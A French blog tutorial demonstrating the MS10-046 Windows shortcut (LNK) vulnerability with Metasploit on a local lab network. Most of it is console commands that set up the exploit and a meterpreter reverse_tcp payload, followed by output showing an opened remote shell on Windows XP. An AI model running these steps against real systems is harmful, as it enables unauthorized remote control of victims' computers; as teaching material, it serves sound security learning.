Maintenant que nous avons un metasploit à jour, et tout frais via les mise à jour svn, nous allons utiliser la faille Windows sur les raccourcis, celle qui a fait pas mal de bruit mi-juillet 2010 ! Bien qu’elle soit patché depuis peu, elle est encore très utilisé, et j’avais très envie de la tester !

1 – Lancement de Metasploit

On commence par se rendre dans le répertoire de metasploit, et le lance en mode console (parce que c’est quand même beaucoup plus amusant !)

cd metasploit
 
sudo ./msfconsole

2 – Choix et configuration de l’exploit

Je recherchais une faille sur les fichiers raccourcis, et donc .lnk, on utilise donc la puissante commande search :

msf > search lnk
Name                                              Rank       Description
----                                              ----       -----------
windows/browser/ms10_046_shortcut_icon_dllloader  excellent  Microsoft Windows Shell LNK Code Execution

Et je récupère donc le nom de l’exploit qui est disponible !

3 – Choix et configuration du payload
msf > use windows/browser/ms10_046_shortcut_icon_dllloader     ''' On définit l exploit'
msf > info                                                     ''' On regarde les champs à renseigner'
msf > set SRVHOST 192.168.0.131                                ''' On définit notre IP'
msf > set SRVPORT 80                                           ''' On définit le port HTTP'
msf > show payloads                                            ''' On affiche les payloads'
msf > SET PAYLOAD windows/meterpreter/reverse_tcp              ''' On choisit ce payload pour permettre l ouverture d'un shell via reverse tcp''
msf > set LHOST 192.168.0.131
4 – Lancement de l’exploit

Tout est prêt, vous pouvez maintenant lancer l’exploit et attendre qu’un client se connecte sur http://192.168.0.131 !

msf > exploit

Après, Metasploit doit s’exciter un peu et vous pouvez lister les sessions distantes disponibles … Et y accéder !!

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -l       'On affiche ici les sessions disponibles'
 
Active sessions
 
===============
 
Id  Type                   Information                              Connection
 
--  ----                   -----------                              ----------
 
1   meterpreter x86/win32  PC-KALUCHE\kaluche @ PC-KALUCHE (ADMIN)  192.168.0.131:4444 -> 192.168.0.140:1091
 
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1     ' On choisit la session 1, et on la lance !!'
 
[*] Starting interaction with 1...
 
meterpreter > shell
 
Process 1844 created.
 
Channel 1 created.
 
Microsoft Windows XP [version 5.1.2600]
 
(C) Copyright 1985-2001 Microsoft Corp.
 
C:\Documents and Settings\kaluche\Bureau>

Et voilà comment on exploite très simplement une faille avec Metasploit … Maintenant, patchez moi tout ça !

Related posts:

  1. [Tuto] Metasploit – Installation via svn sous Ubuntu
  2. Nouvelle faille Asp.Net
  3. Une 0-Day pour Windows !
  4. [Sécurité] Une 0-day pour Adobe Reader 9.3.4 … Encore une …